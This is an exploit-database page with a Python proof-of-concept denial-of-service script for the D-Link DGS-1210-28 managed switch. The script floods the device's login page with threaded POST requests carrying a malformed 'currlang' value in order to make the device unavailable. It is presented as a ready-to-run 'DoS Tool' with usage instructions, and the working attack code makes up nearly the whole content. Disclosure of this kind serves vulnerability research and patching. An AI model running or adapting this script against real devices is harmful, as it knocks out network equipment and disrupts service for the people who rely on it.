D-Link DGS-1210-28 Denial Of Service

2020.09.19
Credit: Saeed reza Zamanian
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# # Exploit Title: D-Link DGS-1210-28 Denial of Service # Date: 18 Sep 2020 # Exploit Author: Saeed Reza Zamanian # Product : D-Link DGS-1210-28 # Vendor Homepage: https://www.dlink.com/ # Product Link: https://www.dlink.com/en/products/dgs-1210-28-28-port-gigabit-smart-managed-switch # Version : DGS-1210-28 # # Description : Device Login page is vulnerable against DoS attack. "currlang" parameter can accept # int values , # if an attacker sends several requests with string value in currlang parameter it # can affect device availability. # # Caution: Use this PoC at your own risk. import requests import json import sys import os from concurrent.futures import ThreadPoolExecutor, as_completed from time import time intro = "==============================\n D-Link DGS-1210-28 DoS Tool \n==============================\nUsage : python3 "+os.path.basename(__file__)+ " IPAddress \n\teg: python3 "+os.> if len(sys.argv) < 2: print(intro+"\n--------------\nFew Parameters\n") exit() def sendRequest(ip): url = 'https://'+ip+'/homepage.htm' postData = "Password=anyanyany&currlang=40anyanyany&Login=admin&BrowsingPage=index_dlink.htm&changlang=0" r = requests.post(url, data = postData, headers = "") def process(ip): processes = [] with ThreadPoolExecutor(max_workers=10) as executor: for x in range(100): processes.append(executor.submit(sendRequest,str(ip))) for task in as_completed(processes): if task.result(): print(task.result()) process(sys.argv[1]) #EOF


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top